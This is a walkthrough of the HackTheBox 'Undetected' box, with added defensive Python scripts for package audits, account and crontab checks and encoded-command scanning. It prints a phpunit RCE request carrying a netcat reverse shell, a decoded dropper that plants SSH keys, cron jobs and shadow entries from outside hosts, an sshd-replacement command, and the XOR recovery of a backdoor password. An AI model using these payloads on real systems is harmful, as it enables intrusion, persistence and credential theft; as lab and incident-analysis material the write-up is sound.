HackTheBox: Undetected — WalkThrough - CyberSec Nerds

Today we will be doing Undetected from HackTheBox, a medium-level box that teaches package misconfigurations, binary reverse engineering and following the path of an attacker. Without further ado, let’s connect to our HTB OpenVPN network and start hacking!!!

Enumerating Open Ports

Only two ports seem to be open, Port 22 and 80.

┌──(kiran㉿kali)-[~/Documents/boxes/htb/undetected]
└─$ nmap -p- --min-rate=10000 undetected.htb -vvv 
Starting Nmap 7.91 ( <https://nmap.org> ) at 2022-07-24 17:25 +0545
PORT      STATE    SERVICE REASON
22/tcp    open     ssh     syn-ack
80/tcp    open     http    syn-ack
11155/tcp filtered unknown no-response
61896/tcp filtered unknown no-response
┌──(kiran㉿kali)-[~/Documents/boxes/htb/undetected]
└─$ nmap -p22,80 -sC -sV undetected.htb -vvv
Starting Nmap 7.91 ( https://nmap.org ) at 2022-07-25 09:50 +0545
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2 (protocol 2.0)
| ssh-hostkey: 
|   3072 be:66:06:dd:20:77:ef:98:7f:6e:73:4a:98:a5:d8:f0 (RSA)
|   256 1f:a2:09:72:70:68:f4:58:ed:1f:6c:49:7d:e2:13:39 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBQjfhdRHFh+eC/2RtmQwDSGmf0psHnd2uqXFyN0zdiyxvF3WCQYaxOgerNZqC0RyQjm2hW0DN6/0oim3slS8dw=
|   256 70:15:39:94:c2:cd:64:cb:b2:3b:d1:3e:f6:09:44:e8 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFdnC6v7My/dt23PaoX7MGbuZ8/8KZh1O+xt4dDFvFQK
80/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu)) 
| http-methods: 
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Diana's Jewelry

Let’s check the website right away. It is an e-commerce site focused on selling jewellery. I couldn’t find any interesting endpoints after browsing the pages for a while. Then I came across the email contact@djewelry.htb, so I added djewelry.htb to my /etc/hosts file.

djewelry.htb serves the same site we get with the IP alone. There’s nothing here either, except the Store link that takes us to store.djewelry.htb, which looks like the subdomain used to place orders. Its pages are under maintenance/migration at the moment.

Since this website already uses a subdomain, the Apache server may host other virtual hosts as well. Let’s brute-force subdomains of djewelry.htb.

┌──(kiran㉿kali)-[/usr/share/seclists/Discovery/DNS]
└─$ gobuster dns -d djewelry.htb -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain:     djewelry.htb
[+] Threads:    10
[+] Timeout:    1s
[+] Wordlist:   /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
===============================================================
2022/07/25 10:17:22 Starting gobuster in DNS enumeration mode
===============================================================
Found: store.djewelry.htb
===============================================================
2022/07/25 10:50:59 Finished
===============================================================

Nothing found except store.djewelry.htb that we already knew. Seems like it is time for some directory bruteforcing.

┌──(kiran㉿kali)-[~/Documents/boxes/htb/undetected]
└─$ ffuf -c -w /opt/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://djewelry.htb/FUZZ -e .php,.txt,.zip

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://djewelry.htb/FUZZ
 :: Wordlist         : FUZZ: /opt/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Extensions       : .php .txt .zip 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

images                  [Status: 301, Size: 313, Words: 20, Lines: 10]
icons                   [Status: 301, Size: 312, Words: 20, Lines: 10]
css                     [Status: 301, Size: 310, Words: 20, Lines: 10]
js                      [Status: 301, Size: 309, Words: 20, Lines: 10]
fonts                   [Status: 301, Size: 312, Words: 20, Lines: 10]
┌──(kiran㉿kali)-[~/Documents/boxes/htb/undetected]
└─$ ffuf -c -w /opt/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://store.djewelry.htb/FUZZ -e .php,.txt,.zip

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://store.djewelry.htb/FUZZ
 :: Wordlist         : FUZZ: /opt/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Extensions       : .php .txt .zip 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

index.php               [Status: 200, Size: 6215, Words: 528, Lines: 196]
images                  [Status: 301, Size: 325, Words: 20, Lines: 10]
products.php            [Status: 200, Size: 7447, Words: 329, Lines: 230]
login.php               [Status: 200, Size: 4129, Words: 464, Lines: 123]
cart.php                [Status: 200, Size: 4396, Words: 470, Lines: 135]
css                     [Status: 301, Size: 322, Words: 20, Lines: 10]
js                      [Status: 301, Size: 321, Words: 20, Lines: 10]
vendor                  [Status: 301, Size: 325, Words: 20, Lines: 10]
fonts                   [Status: 301, Size: 324, Words: 20, Lines: 10]

The /vendor entry looks interesting. It is a common convention to put files coming from third-party sources (the “vendors”) in a folder with that name. We can see every PHP package installed on this server, and the composer/installed.json file inside it gives an exhaustive list of them with their versions.

Let’s use some string operations to filter out the package names and their corresponding versions so that we can poke at each of them with a hope of finding a vulnerability.

┌──(kiran㉿kali)-[~/Documents/boxes/htb/undetected]
└─$ cat installed.json | jq -c '.[] | [.name, .version]'
["doctrine/instantiator","1.4.0"]
["myclabs/deep-copy","1.10.2"]
["phpdocumentor/reflection-common","2.2.0"]
["phpdocumentor/reflection-docblock","5.2.2"]
["phpdocumentor/type-resolver","1.4.0"]
["phpspec/prophecy","v1.10.3"]
["phpunit/php-code-coverage","4.0.8"]
["phpunit/php-file-iterator","1.4.5"]
["phpunit/php-text-template","1.2.1"]
["phpunit/php-timer","1.0.9"]
["phpunit/php-token-stream","2.0.2"]
["phpunit/phpunit","5.6.2"]
["phpunit/phpunit-mock-objects","3.4.4"]
["sebastian/code-unit-reverse-lookup","1.0.2"]
["sebastian/comparator","1.2.4"]
["sebastian/diff","1.4.3"]
["sebastian/environment","2.0.0"]
["sebastian/exporter","1.2.2"]
["sebastian/global-state","1.1.1"]
["sebastian/object-enumerator","1.0.0"]
["sebastian/recursion-context","1.0.5"]
["sebastian/resource-operations","1.0.0"]
["sebastian/version","2.0.1"]
["symfony/polyfill-ctype","v1.23.0"]
["symfony/yaml","v3.4.47"]
["webmozart/assert","1.10.0"]
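The jq one-liner is enough for a CTF, but a defender auditing a deployment wants the same inventory checked against known-bad versions and, more importantly, wants to know why a test framework is in a production /vendor at all. The script below is an added example, not the page's own tooling: it reads installed.json in both the Composer 1 layout (a bare list) and the Composer 2 layout (`{"packages": [...]}`), compares versions against a watch list, and flags dev-only packages. The sample installed.json excerpt and the watch list are constructed here; the single watch-list entry mirrors the page's observation that phpunit 5.6.2 is exploitable, it is not an advisory feed.

```python
import json

# Constructed excerpt of vendor/composer/installed.json in the Composer 2
# layout; Composer 1 wrote a bare list instead, and load_packages() accepts both.
INSTALLED_JSON = json.dumps({
    "packages": [
        {"name": "phpunit/phpunit", "version": "5.6.2"},
        {"name": "symfony/yaml", "version": "v3.4.47"},
        {"name": "webmozart/assert", "version": "1.10.0"},
    ]
})

# Constructed watch list: the page reports phpunit 5.6.2 as exploitable through
# eval-stdin.php. Real deployments should feed this from an advisory source.
WATCH_LIST = {"phpunit/phpunit": "<=5.6.2"}

# Development tooling that must never reach a production /vendor directory;
# `composer install --no-dev` leaves these out.
DEV_ONLY_PREFIXES = ("phpunit/", "phpspec/", "sebastian/")


def load_packages(text):
    """Return (name, version) pairs from either installed.json layout."""
    data = json.loads(text)
    if isinstance(data, dict):
        data = data.get("packages", [])
    return [(p["name"], p["version"]) for p in data]


def version_tuple(v):
    """Turn '5.6.2' or 'v1.23.0' into a comparable tuple of ints."""
    parts = []
    for piece in v.lstrip("v").split("."):
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        parts.append(int(digits) if digits else 0)
    return tuple(parts)


def version_matches(version, constraint):
    """Evaluate a single-operator constraint such as '<=5.6.2'."""
    for op in ("<=", ">=", "==", "<", ">"):
        if constraint.startswith(op):
            break
    else:
        raise ValueError(f"unsupported constraint: {constraint}")
    actual, target = version_tuple(version), version_tuple(constraint[len(op):])
    return {"<=": actual <= target, ">=": actual >= target, "==": actual == target,
            "<": actual < target, ">": actual > target}[op]


def audit(text, watch_list=WATCH_LIST):
    """List watch-list hits and dev-only packages found in installed.json."""
    findings = []
    for name, version in load_packages(text):
        if name in watch_list and version_matches(version, watch_list[name]):
            findings.append(f"{name} {version} matches {watch_list[name]}")
        if name.startswith(DEV_ONLY_PREFIXES):
            findings.append(f"{name} is dev tooling deployed to production")
    return findings


if __name__ == "__main__":
    for line in audit(INSTALLED_JSON):
        print(line)
```

Two fixes follow from the findings: install with `--no-dev` so test frameworks never ship, and deny web access to /vendor in the Apache configuration so that even a stray package cannot be reached over HTTP.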

After a bit of googling, I came across a post about phpunit v5.6.2 being vulnerable to Remote Code Execution on the server. Without further ado, I sent the reverse shell payload through that exploit as shown below and listened with netcat. Luckily, it worked on the first try and gave a shell as the www-data user.

┌──(kiran㉿kali)-[~/Documents/boxes/htb/undetected]
└─$ curl -XPOST --data '<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.45 9001 >/tmp/f");' http://store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
www-data@production:/home$ cat /etc/passwd | grep sh | grep -v ssh
root:x:0:0:root:/root:/bin/bash
steven:x:1000:1000:Steven Wright:/home/steven:/bin/bash
steven1:x:1000:1000:,,,:/home/steven:/bin/bash

Analyzing the /etc/passwd file, two users other than root are present, i.e., steven and steven1. One thing to notice is that both have the same UID (1000), which is odd. I have no permission to access this user’s home directory, so it’s time for horizontal privilege escalation. After checking the files currently owned by the www-data user, one that sticks out is /var/backups/info.

www-data@production:/tmp$ find / -user www-data -ls 2>/dev/null | grep -v "/var/www" | grep -v "/proc" 
   131761    316 -rw-r--r--   1 www-data www-data   322453 Jul 26 11:12 /tmp/out
   131758      0 prw-r--r--   1 www-data www-data        0 Jul 26 15:11 /tmp/f
   131760    304 -rwxr-xr-x   1 www-data www-data   308257 Jul 26 09:22 /tmp/linpease.sh
   141800      4 drwx------   2 www-data www-data     4096 Jul 26 09:13 /tmp/tmux-33
   131759      0 srw-rw----   1 www-data www-data        0 Jul 26 09:13 /tmp/tmux-33/default
        4      0 crw--w----   1 www-data tty      136,   1 Jul 26 15:11 /dev/pts/1
        3      0 crw--w----   1 www-data tty      136,   0 Jul 26 09:16 /dev/pts/0
    15193      4 drwxr-xr-x   2 www-data www-data     4096 Feb  8 19:59 /var/cache/apache2/mod_cache_disk
    17565     28 -r-x--x--x   1 www-data www-data    27296 May 14  2021 /var/backups/info
      697      0 drwx------   2 www-data www-data       40 Jul 26 11:04 /run/screen/S-www-data
        5      0 drwxr-xr-x   2 www-data root           40 Jul 26 06:38 /run/lock/apache2

It is a binary that needs to be reversed.

www-data@production:/var/backups$ file info
info: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=0dc004db7476356e9ed477835e583c68f1d2493a, for GNU/Linux 3.2.0, not stripped
www-data@production:/var/backups$ ./info
[.] starting
[.] namespace sandbox set up
[.] KASLR bypass enabled, getting kernel addr
[-] substring 'ffff' not found in dmesg

Looking inside the file with strings info gives a hex-encoded blob that looks like something of value; let’s decode it.

[-] klogctl(SYSLOG_ACTION_READ_ALL)                                                                                                                                                                                                         
Freeing SMP                                                                                                                                                                                                                                 
[-] substring '%s' not found in dmesg                                                                                                                                                                                                       
ffff                                                                                                                                                                                                                                        
/bin/bash                                                                                                                                                                                                                                   
776765742074656d7066696c65732e78797a2f617574686f72697a65645f6b657973202d4f202f726f6f742f2e7373682f617574686f72697a65645f6b6579733b20776765742074656d7066696c65732e78797a2f2e6d61696e202d4f202f7661722f6c69622f2e6d61696e3b2063686d6f64203735
35202f7661722f6c69622f2e6d61696e3b206563686f20222a2033202a202a202a20726f6f74202f7661722f6c69622f2e6d61696e22203e3e202f6574632f63726f6e7461623b2061776b202d46223a2220272437203d3d20222f62696e2f6261736822202626202433203e3d2031303030207b7379
7374656d28226563686f2022243122313a5c24365c247a5337796b4866464d673361596874345c2431495572685a616e5275445a6866316f49646e6f4f76586f6f6c4b6d6c77626b656742586b2e567447673738654c3757424d364f724e7447625a784b427450753855666d39684d30522f424c6441
436f513054396e2f3a31383831333a303a39393939393a373a3a3a203e3e202f6574632f736861646f7722297d27202f6574632f7061737377643b2061776b202d46223a2220272437203d3d20222f62696e2f6261736822202626202433203e3d2031303030207b73797374656d28226563686f2022
243122202224332220222436222022243722203e2075736572732e74787422297d27202f6574632f7061737377643b207768696c652072656164202d7220757365722067726f757020686f6d65207368656c6c205f3b20646f206563686f202224757365722231223a783a2467726f75703a2467726f
75703a2c2c2c3a24686f6d653a247368656c6c22203e3e202f6574632f7061737377643b20646f6e65203c2075736572732e7478743b20726d2075736572732e7478743b                                                                                                    
[-] fork()                                                                                                                                                                                                                                  
/etc/shadow                                                                                                                                                                                                                                 
[.] checking if we got root
wget tempfiles.xyz/authorized_keys -O /root/.ssh/authorized_keys; wget tempfiles.xyz/.main -O /var/lib/.main; chmod 755 /var/lib/.main; echo "* 3 * * * root /var/lib/.main" >> /etc/crontab; 
awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1"1:\$6\$zS7ykHfFMg3aYht4\$1IUrhZanRuDZhf1oIdnoOvXoolKmlwbkegBXk.VtGg78eL7WBM6OrNtGbZxKBtPu8Ufm9hM0R/BLdACoQ0T9n/:18813:0:99999:7::: >> 
/etc/shadow")}' /etc/passwd; awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1" "$3" "$6" "$7" > users.txt")}' /etc/passwd; while read -r user group home shell _; 
do echo "$user"1":x:$group:$group:,,,:$home:$shell" >> /etc/passwd; done < users.txt; rm users.txt;

The script:

  • Downloads an authorized_keys file from tempfiles.xyz and saves it for root as an SSH backdoor.
  • Downloads a file, .main and saves it in /var/lib/, sets it executable, and adds it to the system crontab file to be run every minute from 3am – 4am each day.
  • Finds each user in /etc/passwd that has the shell /bin/bash and a UID of 1000 or greater and writes a line to /etc/shadow based on it.
  • Finds each user in /etc/passwd with the same criteria again, and this time writes their username, group, home folder, and shell to a file, users.txt.
  • Loops over the rows in users.txt, creating rows in /etc/passwd for them with “1” appended to their username but keeping the same UID.
  • Removes the users.txt file.
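The dropper leaves two artefacts that are easy to check for on any Linux host: a second account sharing an existing UID (the steven/steven1 pair noticed earlier from /etc/passwd) and a system crontab line that runs a hidden file. The script below is an added example, not from the page's author: it parses passwd-format and crontab-format text and reports both anomalies. The /etc/passwd and /etc/crontab contents are constructed samples reflecting the state the page describes; the daemon and www-data rows and the run-parts line are ordinary Ubuntu defaults included so the checks have benign rows to ignore.

```python
import re

# Constructed /etc/passwd sample in the state the dropper leaves it: the
# cloned "steven1" row reuses steven's UID, GID and home directory.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
steven:x:1000:1000:Steven Wright:/home/steven:/bin/bash
steven1:x:1000:1000:,,,:/home/steven:/bin/bash
"""

# Constructed /etc/crontab sample with the persistence line appended.
CRONTAB_SAMPLE = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* 3 * * * root /var/lib/.main
"""

HIDDEN_COMPONENT = re.compile(r"/\.[^/\s]+")        # a dot-file path such as /var/lib/.main
SUSPECT_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")  # world-writable staging areas


def parse_passwd(text):
    """Parse passwd-format text into dicts; malformed rows are skipped."""
    users = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, _, uid, gid, gecos, home, shell = fields
        users.append({"name": name, "uid": int(uid), "gid": int(gid),
                      "gecos": gecos, "home": home, "shell": shell})
    return users


def find_passwd_anomalies(text):
    """Flag UIDs shared by several names and '<name>1' clones of existing accounts."""
    users = parse_passwd(text)
    findings = []
    by_uid = {}
    for u in users:
        by_uid.setdefault(u["uid"], []).append(u["name"])
    for uid, names in sorted(by_uid.items()):
        if len(names) > 1:
            findings.append(f"uid {uid} shared by {', '.join(names)}")
    by_name = {u["name"]: u for u in users}
    for u in users:
        stem = u["name"][:-1]
        if u["name"].endswith("1") and stem in by_name and by_name[stem]["home"] == u["home"]:
            findings.append(f"{u['name']} is a clone of {stem} (same home {u['home']})")
    return findings


def find_crontab_anomalies(text):
    """Flag system-crontab commands that run hidden files or live in staging dirs."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue                      # blank, comment or environment assignment
        parts = line.split(None, 6)       # 5 time fields, user, command
        if len(parts) < 7:
            continue
        user, command = parts[5], parts[6]
        if HIDDEN_COMPONENT.search(command) or command.startswith(SUSPECT_DIRS):
            findings.append(f"{user} runs '{command}' on schedule '{' '.join(parts[:5])}'")
    return findings


if __name__ == "__main__":
    for finding in find_passwd_anomalies(PASSWD_SAMPLE) + find_crontab_anomalies(CRONTAB_SAMPLE):
        print(finding)
```

On a live host, read the real files instead of the samples and add a check of /root/.ssh/authorized_keys against a known-good copy, since the first line of the dropper replaces it outright.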

It’s time to crack the hash for this steven1 user. Loading the hash into hashcat with the popular rockyou.txt wordlist gave us the password ihatehackers.

└─# cat hash
steven1:$6$zS7ykHfFMg3aYht4$1IUrhZanRuDZhf1oIdnoOvXoolKmlwbkegBXk.VtGg78eL7WBM6OrNtGbZxKBtPu8Ufm9hM0R/BLdACoQ2T9n/:18813:0:99999:7:::
┌──(root💀kali)-[/home/…/Documents/boxes/htb/undetected]                                                                                                                                                                                    
└─# hashcat -m 1800 hash /usr/share/wordlists/rockyou.txt --force                                                                                                                                                                           
hashcat (v6.1.1) starting...
$6$zS7ykHfFMg3aYht4$1IUrhZanRuDZhf1oIdnoOvXoolKmlwbkegBXk.VtGg78eL7WBM6OrNtGbZxKBtPu8Ufm9hM0R/BLdACoQ2T9n/:ihatehackers
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: sha512crypt $6$, SHA512 (Unix)
Hash.Target......: $6$zS7ykHfFMg3aYht4$1IUrhZanRuDZhf1oIdnoOvXoolKmlwb...Q2T9n/
Time.Started.....: Wed Jul 27 10:20:56 2022, (2 mins, 30 secs)
Time.Estimated...: Wed Jul 27 10:23:26 2022, (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:      594 H/s (10.18ms) @ Accel:64 Loops:128 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests
Progress.........: 89088/14344387 (0.62%)
Rejected.........: 0/89088 (0.00%)
Restore.Point....: 88832/14344387 (0.62%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:4992-5000
Candidates.#1....: joker4 -> hameed

Started: Wed Jul 27 10:19:37 2022
Stopped: Wed Jul 27 10:23:29 2022

After I logged in as steven1, I got steven‘s shell. This is likely because both users share the same UID. Now I can access the user flag, so it’s time for vertical privilege escalation. I ran linpeas.sh and found an interesting file, /var/mail/steven, which is an email from root@production to steven.

steven@production:~$ cat /var/mail/steven
From root@production  Sun, 25 Jul 2021 10:31:12 GMT
----<SNIP>---
To: steven@production
From: root@production
Subject: Investigations

Hi Steven.

We recently updated the system but are still experiencing some strange behaviour with the Apache service.
We have temporarily moved the web store and database to another server whilst investigations are underway.
If for any reason you need access to the database or web application code, get in touch with Mark and he
will generate a temporary password for you to authenticate to the temporary server.

Thanks,
sysadmin

Since this box is named Undetected, the attacker’s steps presumably went unnoticed. From this mail, one can suspect that something has been done to the Apache service and its files. After looking for a long time without finding anything that stood out, I started searching for files modified around the creation date of /var/backups/info, and found one module, ./mods-available/reader.load, that was modified on 17 May.

steven@production:/etc/apache2$ ls -l /var/backups/info 
-r-x--x--x 1 www-data www-data 27296 May 14  2021 /var/backups/info
steven@production:/etc/apache2$ find . -type f -newermt 2021-05-10 ! -newermt 2021-05-30 -ls 
    50834      4 -rw-r--r--   1 root     root           69 May 17  2021 ./mods-available/reader.load
steven@production:/etc/apache2$ cat ./mods-available/reader.load
LoadModule reader_module      /usr/lib/apache2/modules/mod_reader.so
steven@production:/etc/apache2$ file /usr/lib/apache2/modules/mod_reader.so
/usr/lib/apache2/modules/mod_reader.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=e26fdc45e4b6561d29af8306c2be74f35ab140bb, with debug_info, not stripped
┌──(kiran㉿kali)-[~/Documents/boxes/htb/undetected]
└─$ strings mod_reader.so | less
----<SNIP>---
/bin/bash
mod_reader.c
d2dldCBzaGFyZWZpbGVzLnh5ei9pbWFnZS5qcGVnIC1PIC91c3Ivc2Jpbi9zc2hkOyB0b3VjaCAtZCBgZGF0ZSArJVktJW0tJWQgLXIgL3Vzci9zYmluL2EyZW5tb2RgIC91c3Ivc2Jpbi9zc2hk
;*3$"
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
42PA
GCC: (Debian 10.2.1-6) 10.2.1 20210110
w#%
----<SNIP>---

Running strings on this file as well gave one base64-encoded blob which, when decoded, reveals something interesting: the SSH daemon binary /usr/sbin/sshd has been replaced, and its modification time was set to match /usr/sbin/a2enmod so that it would not stand out in a listing. Let’s copy that binary to our machine and open it in Ghidra.

┌──(kiran㉿kali)-[~/Documents/boxes/htb/undetected]
└─$ echo d2dldCBzaGFyZWZpbGVzLnh5ei9pbWFnZS5qcGVnIC1PIC91c3Ivc2Jpbi9zc2hkOyB0b3VjaCAtZCBgZGF0ZSArJVktJW0tJWQgLXIgL3Vzci9zYmluL2EyZW5tb2RgIC91c3Ivc2Jpbi9zc2hk | base64 -d
	wget sharefiles.xyz/image.jpeg -O /usr/sbin/sshd; touch -d `date +%Y-%m-%d -r /usr/sbin/a2enmod` /usr/sbin/sshd
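Both implants hide their commands the same way: as one long printable string (hex in /var/backups/info, base64 in mod_reader.so) that a quick look at strings output skips over. The scanner below is an added example, not from the page's author: it extracts printable runs the way strings(1) does, tries hex and base64 decoding on every long run, and reports those that decode to printable ASCII containing shell-command markers. The sample buffer is constructed; it embeds the first statement of the page's hex blob, the page's base64 blob, and the base64 alphabet that mod_reader.so also contains, which must not be reported (it is valid base64 but decodes to binary noise).

```python
import base64
import re
import string

PRINTABLE = set(bytes(string.printable, "ascii")) - {0x0B, 0x0C}
SHELL_HINTS = ("wget ", "curl ", "/bin/", "chmod ", "crontab", ">>", "authorized_keys")

# First statement of the hex blob from /var/backups/info (from the page).
HEX_BLOB = ("776765742074656d7066696c65732e78797a2f617574686f72697a65645f6b657973"
            "202d4f202f726f6f742f2e7373682f617574686f72697a65645f6b6579733b")
# Base64 blob from mod_reader.so (from the page).
B64_BLOB = ("d2dldCBzaGFyZWZpbGVzLnh5ei9pbWFnZS5qcGVnIC1PIC91c3Ivc2Jpbi9zc2hkOyB0b3VjaCAtZCBg"
            "ZGF0ZSArJVktJW0tJWQgLXIgL3Vzci9zYmluL2EyZW5tb2RgIC91c3Ivc2Jpbi9zc2hk")
# The decoder alphabet the module embeds; a false-positive candidate.
ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"

# Constructed stand-in for the raw bytes of the two binaries: NUL-separated
# strings in the order they appeared in the page's strings output.
SAMPLE = (b"\x7fELF\x00[-] fork()\x00/etc/shadow\x00" + HEX_BLOB.encode() + b"\x00"
          + b"/bin/bash\x00mod_reader.c\x00" + B64_BLOB.encode() + b"\x00;*3$\"\x00"
          + ALPHABET.encode() + b"\x00GCC: (Debian 10.2.1-6)\x00")


def extract_strings(data, min_len=4):
    """Same contract as strings(1): runs of printable bytes of min_len or longer."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def try_decode(token):
    """Return (encoding, text) if token is hex or base64 hiding printable ASCII."""
    candidates = []
    if len(token) % 2 == 0 and re.fullmatch(r"[0-9a-fA-F]+", token):
        candidates.append(("hex", bytes.fromhex(token)))
    if len(token) % 4 == 0 and re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", token):
        try:
            candidates.append(("base64", base64.b64decode(token, validate=True)))
        except ValueError:  # binascii.Error is a ValueError subclass
            pass
    for encoding, raw in candidates:
        if raw and all(b in PRINTABLE for b in raw):
            return encoding, raw.decode("ascii")
    return None


def find_encoded_commands(data, min_len=32):
    """Report long strings that decode to text containing shell-command markers."""
    hits = []
    for s in extract_strings(data):
        if len(s) < min_len:
            continue
        decoded = try_decode(s)
        if decoded and any(hint in decoded[1] for hint in SHELL_HINTS):
            hits.append(decoded)
    return hits


if __name__ == "__main__":
    for encoding, text in find_encoded_commands(SAMPLE):
        print(f"[{encoding}] {text}")
```

Run it over a suspect Apache module or cron binary by reading the file into `data`; the same two-stage idea (decode, then look for command syntax) catches the common case where the dropper is a plain shell one-liner rather than a compiled payload.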

Reversing the file gives an overwhelming number of functions to look at. In the auth folder, auth_password looks like the place an attacker would have inserted a payload.

This is the C code for auth_password function.

/* WARNING: Could not reconcile some variable overlaps */

int auth_password(ssh *ssh,char *password)

{
  Authctxt *ctxt;
  passwd *ppVar1;
  int iVar2;
  uint uVar3;
  byte *pbVar4;
  byte *pbVar5;
  size_t sVar6;
  byte bVar7;
  int iVar8;
  long in_FS_OFFSET;
  char backdoor [31];
  byte local_39 [9];
  long local_30;
  
  bVar7 = 0xd6;
  ctxt = (Authctxt *)ssh->authctxt;
  local_30 = *(long *)(in_FS_OFFSET + 0x28);
  backdoor._28_2_ = 0xa9f4;
  ppVar1 = ctxt->pw;
  iVar8 = ctxt->valid;
  backdoor._24_4_ = 0xbcf0b5e3;
  backdoor._16_8_ = 0xb2d6f4a0fda0b3d6;
  backdoor[30] = -0x5b;
  backdoor._0_4_ = 0xf0e7abd6;
  backdoor._4_4_ = 0xa4b3a3f3;
  backdoor._8_4_ = 0xf7bbfdc8;
  backdoor._12_4_ = 0xfdb3d6e7;
  pbVar4 = (byte *)backdoor;
  while( true ) {
    pbVar5 = pbVar4 + 1;
    *pbVar4 = bVar7 ^ 0x96;
    if (pbVar5 == local_39) break;
    bVar7 = *pbVar5;
    pbVar4 = pbVar5;
  }
  iVar2 = strcmp(password,backdoor);
  uVar3 = 1;
  if (iVar2 != 0) {
    sVar6 = strlen(password);
    uVar3 = 0;
    if (sVar6 < 0x401) {
      if ((ppVar1->pw_uid == 0) && (options.permit_root_login != 3)) {
        iVar8 = 0;
      }
      if ((*password != '\0') ||
         (uVar3 = options.permit_empty_passwd, options.permit_empty_passwd != 0)) {
        if (auth_password::expire_checked == 0) {
          auth_password::expire_checked = 1;
          iVar2 = auth_shadow_pwexpired(ctxt);
          if (iVar2 != 0) {
            ctxt->force_pwchange = 1;
          }
        }
        iVar2 = sys_auth_passwd(ssh,password);
        if (ctxt->force_pwchange != 0) {
          auth_restrict_session(ssh);
        }
        uVar3 = (uint)(iVar2 != 0 && iVar8 != 0);
      }
    }
  }
  if (local_30 == *(long *)(in_FS_OFFSET + 0x28)) {
    return uVar3;
  }
                    /* WARNING: Subroutine does not return */
  __stack_chk_fail();
}

Looks like we need to recover the backdoor string from this code: the hard-coded buffer is XORed with 0x96 and compared with strcmp before the real password check runs. The script below extracts that password.

import binascii

# The 31 constant bytes Ghidra shows being stored into `backdoor`, written
# here from the highest address down to the lowest (backdoor[30] first).
backdoor_str = 'a5a9f4bcf0b5e3b2d6f4a0fda0b3d6fdb3d6e7f7bbfdc8a4b3a3f3f0e7abd6'
# Reverse into memory order so that byte 0 is backdoor[0].
backdoor = binascii.unhexlify(backdoor_str)[::-1]
print(f'Backdoor is: {backdoor}')
# Apply the same XOR with 0x96 that the decompiled loop performs in place.
print(''.join([chr(b ^ 0x96) for b in backdoor]))
#--------------Reference: 0xdf.gitlab.io---------------#
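Typing the hex string by hand, as the script above does, is error-prone because Ghidra prints each store as a little-endian integer of a different width. The following added example (mine, not the page's or 0xdf's) rebuilds the buffer directly from the `backdoor._off_width_ = value` assignments in the decompiled function, applies the same XOR, and cross-checks the result against the hand-reversed hex from the script above. The field list and key are copied from the decompiler output on the page; for an incident responder this confirms the exact credential that the replaced sshd accepts, so that it can be tested for in logs and the binary restored from the distribution package.

```python
import struct

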